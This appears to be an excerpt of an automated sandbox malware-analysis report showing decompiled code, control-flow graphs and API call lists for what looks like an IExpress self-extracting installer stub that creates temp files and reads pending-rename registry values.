                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A04096,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?), ref: 00A025B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?,00A04096), ref: 00A025CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A01ED3,00000001,00000000,?,?,00A04137,?,00A04096), ref: 00A025DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A04096,00A04096,?,00A01ED3,00000001,00000000,?,?,00A04137,?), ref: 00A025FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A04096,00000000,00000000,00000000,00000000,?,00A01ED3,00000001,00000000), ref: 00A0261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A025F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A025C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A025A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 5ad11c906bc96d2e3147c72e2f8c71b9a0926c5b6fca53d364e6bbe115f7fabb
                                                                                                                                                                                                                                            • Instruction ID: 6ecf4514ce3054502fdf59e016f98f7acda3ae73db34d2788d3656b6ab8953a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ad11c906bc96d2e3147c72e2f8c71b9a0926c5b6fca53d364e6bbe115f7fabb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23118F35A0232CBBEF20DB91AC1DEFBBE7CEF117A1F104155B809A2080D6355E4AD7A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 577 a06a60-a06a91 call a07155 call a07208 GetStartupInfoW 583 a06a93-a06aa2 577->583 584 a06aa4-a06aa6 583->584 585 a06abc-a06abe 583->585 586 a06aa8-a06aad 584->586 587 a06aaf-a06aba Sleep 584->587 588 a06abf-a06ac5 585->588 586->588 587->583 589 a06ad1-a06ad7 588->589 590 a06ac7-a06acf _amsg_exit 588->590 592 a06b05 589->592 593 a06ad9-a06ae9 call a06c3f 589->593 591 a06b0b-a06b11 590->591 595 a06b13-a06b24 _initterm 591->595 596 a06b2e-a06b30 591->596 592->591 597 a06aee-a06af2 593->597 595->596 598 a06b32-a06b39 596->598 599 a06b3b-a06b42 596->599 597->591 600 a06af4-a06b00 597->600 598->599 601 a06b44-a06b51 call a07060 599->601 602 a06b67-a06b71 599->602 604 a06c39-a06c3e call a0724d 600->604 601->602 613 a06b53-a06b65 601->613 603 a06b74-a06b79 602->603 606 a06bc5-a06bc8 603->606 607 a06b7b-a06b7d 603->607 614 a06bd6-a06be3 _ismbblead 606->614 615 a06bca-a06bd3 606->615 610 a06b94-a06b98 607->610 611 a06b7f-a06b81 607->611 619 a06ba0-a06ba2 610->619 620 a06b9a-a06b9e 610->620 611->606 618 a06b83-a06b85 611->618 613->602 616 a06be5-a06be6 614->616 617 a06be9-a06bed 614->617 615->614 616->617 617->603 621 a06c1e-a06c25 617->621 618->610 622 a06b87-a06b8a 618->622 623 a06ba3-a06bbc call a02bfb 619->623 620->623 625 a06c32 621->625 626 a06c27-a06c2d _cexit 621->626 622->610 627 a06b8c-a06b92 622->627 623->621 630 a06bbe-a06bbf exit 623->630 625->604 626->625 627->618 630->606
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A07155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa072b8);
                                                                                                                                                                                                                                            				E00A07208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa088b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa088b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa081e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa088b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A06C3F(0xa010b8, 0xa010c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A06FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa088b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa010b4);
                                                                                                                                                                                                                                            							_push(0xa010ac);
                                                                                                                                                                                                                                            							L00A07202();
                                                                                                                                                                                                                                            							 *0xa088b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa088ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa088b4;
                                                                                                                                                                                                                                            						if( *0xa088b4 != 0 && E00A07060(_t71, 0xa088b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa088b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa0a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A02BFB(0xa00000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa081e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa081f8;
                                                                                                                                                                                                                                            							if( *0xa081f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa081e4;
                                                                                                                                                                                                                                            							if( *0xa081e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa081e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E00A0724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a06a60
                                                                                                                                                                                                                                            0x00a06a6a
                                                                                                                                                                                                                                            0x00a06a6c
                                                                                                                                                                                                                                            0x00a06a71
                                                                                                                                                                                                                                            0x00a06a78
                                                                                                                                                                                                                                            0x00a06a7f
                                                                                                                                                                                                                                            0x00a06a85
                                                                                                                                                                                                                                            0x00a06a8e
                                                                                                                                                                                                                                            0x00a06a91
                                                                                                                                                                                                                                            0x00a06a93
                                                                                                                                                                                                                                            0x00a06a9c
                                                                                                                                                                                                                                            0x00a06aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06aa6
                                                                                                                                                                                                                                            0x00a06ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06aa8
                                                                                                                                                                                                                                            0x00a06aaa
                                                                                                                                                                                                                                            0x00a06aab
                                                                                                                                                                                                                                            0x00a06aab
                                                                                                                                                                                                                                            0x00a06abf
                                                                                                                                                                                                                                            0x00a06abf
                                                                                                                                                                                                                                            0x00a06ac5
                                                                                                                                                                                                                                            0x00a06ad1
                                                                                                                                                                                                                                            0x00a06ad7
                                                                                                                                                                                                                                            0x00a06b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06ad9
                                                                                                                                                                                                                                            0x00a06ad9
                                                                                                                                                                                                                                            0x00a06ae9
                                                                                                                                                                                                                                            0x00a06af0
                                                                                                                                                                                                                                            0x00a06af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06af4
                                                                                                                                                                                                                                            0x00a06af4
                                                                                                                                                                                                                                            0x00a06afb
                                                                                                                                                                                                                                            0x00a06afb
                                                                                                                                                                                                                                            0x00a06af2
                                                                                                                                                                                                                                            0x00a06ac7
                                                                                                                                                                                                                                            0x00a06ac7
                                                                                                                                                                                                                                            0x00a06ac9
                                                                                                                                                                                                                                            0x00a06b0b
                                                                                                                                                                                                                                            0x00a06b0b
                                                                                                                                                                                                                                            0x00a06b11
                                                                                                                                                                                                                                            0x00a06b13
                                                                                                                                                                                                                                            0x00a06b18
                                                                                                                                                                                                                                            0x00a06b1d
                                                                                                                                                                                                                                            0x00a06b24
                                                                                                                                                                                                                                            0x00a06b24
                                                                                                                                                                                                                                            0x00a06b30
                                                                                                                                                                                                                                            0x00a06b39
                                                                                                                                                                                                                                            0x00a06b39
                                                                                                                                                                                                                                            0x00a06b3b
                                                                                                                                                                                                                                            0x00a06b42
                                                                                                                                                                                                                                            0x00a06b57
                                                                                                                                                                                                                                            0x00a06b5f
                                                                                                                                                                                                                                            0x00a06b65
                                                                                                                                                                                                                                            0x00a06b65
                                                                                                                                                                                                                                            0x00a06b67
                                                                                                                                                                                                                                            0x00a06b6c
                                                                                                                                                                                                                                            0x00a06b6e
                                                                                                                                                                                                                                            0x00a06b71
                                                                                                                                                                                                                                            0x00a06b74
                                                                                                                                                                                                                                            0x00a06b74
                                                                                                                                                                                                                                            0x00a06b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06b7d
                                                                                                                                                                                                                                            0x00a06b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06b83
                                                                                                                                                                                                                                            0x00a06b8c
                                                                                                                                                                                                                                            0x00a06b8d
                                                                                                                                                                                                                                            0x00a06b90
                                                                                                                                                                                                                                            0x00a06b90
                                                                                                                                                                                                                                            0x00a06b83
                                                                                                                                                                                                                                            0x00a06b81
                                                                                                                                                                                                                                            0x00a06b94
                                                                                                                                                                                                                                            0x00a06b98
                                                                                                                                                                                                                                            0x00a06ba2
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06b9a
                                                                                                                                                                                                                                            0x00a06ba3
                                                                                                                                                                                                                                            0x00a06bab
                                                                                                                                                                                                                                            0x00a06bb0
                                                                                                                                                                                                                                            0x00a06bb5
                                                                                                                                                                                                                                            0x00a06bbc
                                                                                                                                                                                                                                            0x00a06bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06bbf
                                                                                                                                                                                                                                            0x00a06c1e
                                                                                                                                                                                                                                            0x00a06c25
                                                                                                                                                                                                                                            0x00a06c27
                                                                                                                                                                                                                                            0x00a06c2d
                                                                                                                                                                                                                                            0x00a06c2d
                                                                                                                                                                                                                                            0x00a06c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06bc5
                                                                                                                                                                                                                                            0x00a06bc5
                                                                                                                                                                                                                                            0x00a06bc8
                                                                                                                                                                                                                                            0x00a06bcc
                                                                                                                                                                                                                                            0x00a06bce
                                                                                                                                                                                                                                            0x00a06bce
                                                                                                                                                                                                                                            0x00a06bd1
                                                                                                                                                                                                                                            0x00a06bd3
                                                                                                                                                                                                                                            0x00a06bd3
                                                                                                                                                                                                                                            0x00a06bd6
                                                                                                                                                                                                                                            0x00a06bda
                                                                                                                                                                                                                                            0x00a06be1
                                                                                                                                                                                                                                            0x00a06be3
                                                                                                                                                                                                                                            0x00a06be5
                                                                                                                                                                                                                                            0x00a06be5
                                                                                                                                                                                                                                            0x00a06be6
                                                                                                                                                                                                                                            0x00a06be6
                                                                                                                                                                                                                                            0x00a06be9
                                                                                                                                                                                                                                            0x00a06bea
                                                                                                                                                                                                                                            0x00a06bea
                                                                                                                                                                                                                                            0x00a06b74
                                                                                                                                                                                                                                            0x00a06c39
                                                                                                                                                                                                                                            0x00a06c3e
                                                                                                                                                                                                                                            0x00a06c3e
                                                                                                                                                                                                                                            0x00a06abe
                                                                                                                                                                                                                                            0x00a06abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A07182
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetCurrentProcessId.KERNEL32 ref: 00A07191
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetCurrentThreadId.KERNEL32 ref: 00A0719A
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetTickCount.KERNEL32 ref: 00A071A3
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: QueryPerformanceCounter.KERNEL32(?), ref: 00A071B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A072B8,00000058), ref: 00A06A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A06AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A06AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A06B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A06B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A06BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A06BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 23d98a1d4cf343940bd64f2c43842d78b2561493175b7aea91e071429eba7ecd
                                                                                                                                                                                                                                            • Instruction ID: 78dd99f8836d5ff1f1b13f4629af221e2c259549e5305cffabcb37cd18e03f14
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23d98a1d4cf343940bd64f2c43842d78b2561493175b7aea91e071429eba7ecd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7141F67098472D9FEB21EFA4F9047AA77F0BB49768F14412AE881E32D1CB7448538B94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 a058c8-a058d5 632 a058d8-a058dd 631->632 632->632 633 a058df-a058f1 LocalAlloc 632->633 634 a058f3-a05901 call a044b9 633->634 635 a05919-a05959 call a01680 call a0658a CreateFileA LocalFree 633->635 638 a05906-a05910 call a06285 634->638 635->638 644 a0595b-a0596c CloseHandle GetFileAttributesA 635->644 645 a05912-a05918 638->645 644->638 646 a0596e-a05970 644->646 646->638 647 a05972-a0597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A058C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A01680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A0658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a058cd
                                                                                                                                                                                                                                            0x00a058d1
                                                                                                                                                                                                                                            0x00a058d3
                                                                                                                                                                                                                                            0x00a058d5
                                                                                                                                                                                                                                            0x00a058d8
                                                                                                                                                                                                                                            0x00a058d8
                                                                                                                                                                                                                                            0x00a058da
                                                                                                                                                                                                                                            0x00a058db
                                                                                                                                                                                                                                            0x00a058e1
                                                                                                                                                                                                                                            0x00a058ed
                                                                                                                                                                                                                                            0x00a058f1
                                                                                                                                                                                                                                            0x00a0591e
                                                                                                                                                                                                                                            0x00a0592c
                                                                                                                                                                                                                                            0x00a05943
                                                                                                                                                                                                                                            0x00a0594a
                                                                                                                                                                                                                                            0x00a0594d
                                                                                                                                                                                                                                            0x00a05953
                                                                                                                                                                                                                                            0x00a05959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0595b
                                                                                                                                                                                                                                            0x00a0595c
                                                                                                                                                                                                                                            0x00a05963
                                                                                                                                                                                                                                            0x00a0596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05972
                                                                                                                                                                                                                                            0x00a05974
                                                                                                                                                                                                                                            0x00a0597a
                                                                                                                                                                                                                                            0x00a0597a
                                                                                                                                                                                                                                            0x00a0596c
                                                                                                                                                                                                                                            0x00a058f3
                                                                                                                                                                                                                                            0x00a05901
                                                                                                                                                                                                                                            0x00a05906
                                                                                                                                                                                                                                            0x00a0590b
                                                                                                                                                                                                                                            0x00a05910
                                                                                                                                                                                                                                            0x00a05910
                                                                                                                                                                                                                                            0x00a05918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A058E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
